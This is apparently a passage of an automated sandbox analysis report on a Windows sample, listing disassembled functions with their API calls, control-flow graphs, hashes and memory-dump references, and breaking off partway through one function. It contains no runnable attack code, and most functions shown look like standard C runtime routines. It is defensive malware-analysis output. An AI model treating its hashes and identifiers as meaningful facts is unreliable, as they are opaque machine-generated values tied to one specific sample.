                                                                                                                                        • Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
                                                                                                                                        • Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 0040E61C Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 0040E6F8
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 0040E702
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 0040E70F
                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 0040E72A
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 0040E731
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2579439406-0
                                                                                                                                        • Opcode ID: bc06e2a25031c2c558872983b213d7b3e0077b483b6be20e3db30540cf558dbb
                                                                                                                                        • Instruction ID: 091cf59633f64f73d3eb463006ce9cf2ac492d5d73b5fbb9e3412c3bad16e63c
                                                                                                                                        • Opcode Fuzzy Hash: bc06e2a25031c2c558872983b213d7b3e0077b483b6be20e3db30540cf558dbb
                                                                                                                                        • Instruction Fuzzy Hash: 4F31DFB0D1132D9BCB20DF65D9897C9BBB8EF18304F5040EAA50CA6251EB789F848F49
                                                                                                                                        Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2579439406-0
                                                                                                                                        • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                        • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                        • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                        • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                        Function 00416F6A Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00417066
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00417073
                                                                                                                                          • Part of subcall function 0040EAA2: GetModuleFileNameA.KERNEL32(00000000,00423661,00000104), ref: 0040EB45
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled$FileModuleName
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 787209826-0
                                                                                                                                        • Opcode ID: 58989c2155fa601ee213af073706d08331aab889389bcdc4fd9c24749d6458f6
                                                                                                                                        • Instruction ID: b1647b16c57129e15f1261ce62323eaccaae119fe7bea347a93ce5ecefaf6e7c
                                                                                                                                        • Opcode Fuzzy Hash: 58989c2155fa601ee213af073706d08331aab889389bcdc4fd9c24749d6458f6
                                                                                                                                        • Instruction Fuzzy Hash: 6D210670D1132D9BCB21DF65DD897C9BBB8AF08704F1041EAE50CA6260DBB49BC18F59
                                                                                                                                        Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                        • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                        • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                        • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                        • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                        Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                        • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                                        • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                                        • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                                        Function 00413780 Relevance: 1.3, Strings: 1, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 08A
                                                                                                                                        • API String ID: 0-3446600063
                                                                                                                                        • Opcode ID: efedc80838d82665644c668c37690441f50efc68b5844c497c702a1d483f6918
                                                                                                                                        • Instruction ID: 7833fe8d59714f648ef1272d262f850ab0783a042d5d0eb5cb65c8a4a93170ae
                                                                                                                                        • Opcode Fuzzy Hash: efedc80838d82665644c668c37690441f50efc68b5844c497c702a1d483f6918
                                                                                                                                        • Instruction Fuzzy Hash: 0CF0A7777002145F9714CF59D8C0DAA73EAEBC4B2531AC0AAE9188B346DA35DD86C798
                                                                                                                                        Function 0041087E Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 112libraryloadermemoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 357 41087e-410890 GetModuleHandleW 358 410892-410898 call 40e76a 357->358 359 410899-41089d 357->359 358->359 361 410a01 call 410598 359->361 362 4108a3-4108ea GetProcAddress * 4 359->362 369 410a06 361->369 364 410902-410921 362->364 365 4108ec-4108f3 362->365 368 410926-410934 TlsAlloc 364->368 365->364 367 4108f5-4108fc 365->367 367->364 370 4108fe-410900 367->370 368->369 371 41093a-410945 TlsSetValue 368->371 372 410a08-410a0a 369->372 370->364 370->368 371->369 373 41094b-41099a call 40ea54 call 41046e * 4 call 40d564 371->373 373->361 386 41099c-4109b7 call 4104e9 373->386 386->361 390 4109b9-4109cb call 411cba 386->390 390->361 393 4109cd-4109e4 call 4104e9 390->393 393->361 397 4109e6-4109ff call 4105d5 GetCurrentThreadId 393->397 397->372
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00410888
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004108AF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004108BC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004108C9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004108D6
                                                                                                                                        • TlsAlloc.KERNEL32 ref: 00410926
                                                                                                                                        • TlsSetValue.KERNEL32(00000000), ref: 00410941
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004109F0
                                                                                                                                          • Part of subcall function 0040E76A: Sleep.KERNEL32(000003E8,00000000,?,00410538,KERNEL32.DLL,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 0040E776
                                                                                                                                          • Part of subcall function 0040E76A: GetModuleHandleW.KERNEL32(00000001,?,00410538,KERNEL32.DLL,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 0040E77F
                                                                                                                                          • Part of subcall function 00410598: TlsFree.KERNEL32(FFFFFFFF,00410A06), ref: 004105C3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModule$AllocCurrentFreeSleepThreadValue
                                                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                        • API String ID: 3443574016-3819984048
                                                                                                                                        • Opcode ID: da961c5303e01747c018ef57bfb642570370f9effd6469fcb74b0df48161029f
                                                                                                                                        • Instruction ID: fad7744f73fa57a3831d0299b89d98de25ed2071cdec20fa99ad2510385bcd0d
                                                                                                                                        • Opcode Fuzzy Hash: da961c5303e01747c018ef57bfb642570370f9effd6469fcb74b0df48161029f
                                                                                                                                        • Instruction Fuzzy Hash: 0E3182B1A03300AAD730AF79AD0569A3AB5EB46365750453BE414E22B5EBFC85C3CF5C
                                                                                                                                        Function 00413B7E Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 128libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 400 413b7e-413b9b call 4104e0 403 413ba1-413bb0 LoadLibraryA 400->403 404 413c2f-413c36 400->404 407 413ce0 403->407 408 413bb6-413bc6 GetProcAddress 403->408 405 413c87-413c8e 404->405 406 413c38-413c3e 404->406 409 413cc0-413cce call 4104e9 405->409 410 413c90-413c99 call 4104e9 405->410 406->405 411 413c40-413c59 call 4104e9 * 2 406->411 413 413ce2-413ce6 407->413 408->407 412 413bcc-413c19 call 41046e GetProcAddress call 41046e GetProcAddress call 41046e GetProcAddress call 41046e 408->412 409->407 422 413cd0-413cde 409->422 410->409 423 413c9b-413ca2 410->423 411->405 430 413c5b-413c5d 411->430 412->404 440 413c1b-413c2a GetProcAddress call 41046e 412->440 422->413 423->409 432 413ca4-413cab 423->432 430->405 433 413c5f-413c63 430->433 432->409 435 413cad-413cb6 call 4104e9 432->435 442 413c65-413c76 433->442 443 413c7e-413c85 433->443 435->409 445 413cb8-413cbd 435->445 440->404 442->443 449 413c78-413c7c 442->449 443->409 445->409 449->405 449->443
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(USER32.DLL,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library), ref: 00413BA6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00413BC2
                                                                                                                                          • Part of subcall function 0041046E: TlsGetValue.KERNEL32(00000000,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410480
                                                                                                                                          • Part of subcall function 0041046E: TlsGetValue.KERNEL32(FFFFFFFF,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410497
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00413BDF
                                                                                                                                          • Part of subcall function 0041046E: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 004104AD
                                                                                                                                          • Part of subcall function 0041046E: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004104C8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00413BF4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00413C09
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00413C21
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$Value$HandleLibraryLoadModule
                                                                                                                                        • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                        • API String ID: 2739679353-232180764
                                                                                                                                        • Opcode ID: 0fe31dc5fbe917493fbca0db843afb676bd80b3aff3ad9f24195411be4002701
                                                                                                                                        • Instruction ID: 6316a36fe1d9ac9490b193d2c8a82e7bd04ee30064d26f70d75e2630d1dc87b6
                                                                                                                                        • Opcode Fuzzy Hash: 0fe31dc5fbe917493fbca0db843afb676bd80b3aff3ad9f24195411be4002701
                                                                                                                                        • Instruction Fuzzy Hash: 7441BB72600211AADB20AFB69D45A9F7AF49B04751F55442BE500E3250FFBCCFC58BAC
                                                                                                                                        Function 00417081 Relevance: 16.8, APIs: 11, Instructions: 340COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 798 417081-4170a0 799 4170a2-4170bb LCMapStringW 798->799 800 4170da-4170dd 798->800 801 4170c5-4170ce GetLastError 799->801 802 4170bd-4170c3 799->802 803 417101-417109 800->803 804 4170df-4170e2 800->804 801->800 808 4170d0 801->808 802->800 806 4172bb-4172c4 803->806 807 41710f-417111 803->807 805 4170e5-4170e8 804->805 809 4170f2-4170fb 805->809 810 4170ea-4170ed 805->810 812 4172c6-4172cb 806->812 813 4172ce-4172d1 806->813 807->806 811 417117-41711a 807->811 808->800 815 4170fd 809->815 816 4170fe 809->816 810->805 814 4170ef 810->814 817 417120-417126 811->817 818 4172ec-4172ee 811->818 812->813 819 4172d3-4172d8 813->819 820 4172db-4172ea call 417a20 813->820 814->809 815->816 816->803 822 417130-417157 MultiByteToWideChar 817->822 823 417128-41712d 817->823 821 417414-41741d 818->821 819->820 820->818 828 4172f3-4172f6 820->828 826 41741f call 40ce09 821->826 822->818 827 41715d 822->827 823->822 829 417424-417425 826->829 830 4171a2 827->830 831 41715f-417169 827->831 832 4173d7-4173ef LCMapStringA 828->832 833 4172fc-417316 call 417a69 828->833 834 4171a5-4171a8 830->834 831->830 835 41716b-417174 831->835 836 4173f1-4173f4 832->836 833->818 853 417318-417331 LCMapStringA 833->853 834->818 838 4171ae-4171c1 MultiByteToWideChar 834->838 839 417176-41717f call 40cfb0 835->839 840 417189-417192 call 40b84d 835->840 842 4173f6-4173fe call 40b6b5 836->842 843 4173ff-417404 836->843 846 4171c7-4171e2 LCMapStringW 838->846 847 4172aa-4172b6 call 4147ae 838->847 856 417181-417187 839->856 857 41719d-4171a0 839->857 840->857 859 417194 840->859 842->843 851 417412 843->851 852 417406-417409 843->852 846->847 855 4171e8-4171ef 846->855 847->821 851->821 852->851 860 41740b-417411 call 40b6b5 852->860 861 417333-417335 853->861 862 41733a 853->862 864 4171f1-4171f4 855->864 865 41721a-41721c 855->865 868 41719a 856->868 857->834 859->868 860->851 861->836 870 417379 862->870 871 41733c-41733f 862->871 864->847 872 4171fa-4171fd 864->872 866 417263 865->866 867 41721e-417228 865->867 878 417265-417267 866->878 867->866 874 41722a-417233 867->874 868->857 875 41737b-41737d 870->875 871->870 877 417341-417349 871->877 872->847 873 417203-417215 LCMapStringW 872->873 873->847 879 417235-41723e call 40cfb0 874->879 880 41724b-417254 call 40b84d 874->880 875->861 881 41737f-4173a3 call 40ba30 LCMapStringA 875->881 882 417361-41736a call 40b84d 877->882 883 41734b-417354 call 40cfb0 877->883 878->847 884 417269-41727f LCMapStringW 878->884 879->847 904 417240-417249 879->904 907 417256-41725c 880->907 908 41725f-417261 880->908 905 4173a5-4173a7 881->905 906 4173a9-4173cb call 417a69 881->906 900 417375-417377 882->900 901 41736c-417372 882->901 883->861 909 417356-41735f 883->909 886 417281-417286 884->886 887 4172a3-4172a9 call 4147ae 884->887 893 417288-41728a 886->893 894 41728c-41728f 886->894 887->847 902 417292-4172a0 WideCharToMultiByte 893->902 894->902 900->875 901->900 902->887 904->878 910 4173ce-4173d5 call 4147ae 905->910 906->910 907->908 908->878 909->875 910->836
                                                                                                                                        APIs
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,0041219E,00000100,00000000,?,?,?,?,7FFFFFFF,?,00004000), ref: 004170B3
                                                                                                                                        • GetLastError.KERNEL32(?,00004000,7FFFFFFF,00000000,?,?,00000000,00004000,00000000,00000000,?,0041219E,?,00000000,00000000), ref: 004170C5
                                                                                                                                        • MultiByteToWideChar.KERNEL32(0041219E,00000000,?,?,00000000,00000000,0041219E,00000100,00000000,?,?,?,?,7FFFFFFF,?,00004000), ref: 00417151
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00004000,7FFFFFFF,00000000,?,?,00000000,00004000,00000000,00000000), ref: 004171BD
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00004000,7FFFFFFF,00000000,?,?,00000000,00004000,00000000,00000000), ref: 004171D9
                                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,0041219E,00000100,00000000,?,?,?,?), ref: 0041732A
                                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,0041219E,00000100,00000000,?), ref: 0041739C
                                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,00000100,0041219E,00000100,00000000,?,?,?,?,7FFFFFFF,?,00004000), ref: 004173E9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1775797328-0
                                                                                                                                        • Opcode ID: a16583e9d2d5c9a4990361f5dab3c24c1027fc4bfe8588b4c27167f0f9a1fd6d
                                                                                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                        • Opcode Fuzzy Hash: a16583e9d2d5c9a4990361f5dab3c24c1027fc4bfe8588b4c27167f0f9a1fd6d
                                                                                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                        Function 00414661 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InterlockedDecrement.KERNEL32(SA), ref: 0041467B
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414688
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414695
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004146A2
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004146AF
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004146CB
                                                                                                                                        • InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004146F1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DecrementInterlocked
                                                                                                                                        • String ID: SA
                                                                                                                                        • API String ID: 3448037634-1954343693
                                                                                                                                        • Opcode ID: 477eb8f2978c6dba48184111582f2e4fe97a9e13532dd84427a4bead277ee740
                                                                                                                                        • Instruction ID: 9a57645e9d711957f0b1177cc73d8bf7343520b358408f524570bf87b47795ee
                                                                                                                                        • Opcode Fuzzy Hash: 477eb8f2978c6dba48184111582f2e4fe97a9e13532dd84427a4bead277ee740
                                                                                                                                        • Instruction Fuzzy Hash: 77110C71B00719A7DB109F69CC84B97BBACAF85758F084527A818D7240DB7CE8918BA8
                                                                                                                                        Function 004105D5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 57libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,00410710,00000000,00000000,?,00000001,0040BFC6,0040B72C), ref: 004105E7
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0041061B
                                                                                                                                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0041062B
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 0041065A
                                                                                                                                          • Part of subcall function 0040E76A: Sleep.KERNEL32(000003E8,00000000,?,00410538,KERNEL32.DLL,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 0040E776
                                                                                                                                          • Part of subcall function 0040E76A: GetModuleHandleW.KERNEL32(00000001,?,00410538,KERNEL32.DLL,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 0040E77F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc$IncrementInterlockedSleep
                                                                                                                                        • String ID: @.B$DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                        • API String ID: 3998264955-2889590918
                                                                                                                                        • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                                                                                        • Instruction ID: ea0ea8473cec590b50870dd3b4b8be5e3c50d09318c2f51e843d2d197a1947a1
                                                                                                                                        • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                                                                                        • Instruction Fuzzy Hash: F4119071940701EED720AF76D90179EBBE0AF44314F10892FE499A72A1CBB89A958F5C
                                                                                                                                        Function 004147EC Relevance: 13.8, APIs: 9, Instructions: 328COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CompareStringW.KERNEL32(00000000,00000000,00420398,00000001,00420398,00000001), ref: 00414825
                                                                                                                                        • GetLastError.KERNEL32 ref: 0041483B
                                                                                                                                        • GetCPInfo.KERNEL32(?,?), ref: 004148ED
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,000000FF,00000000,00000000), ref: 00414973
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,000000FF,00000000,00000000,?,000000FF,00000000,00000000), ref: 004149E8
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 00414A01
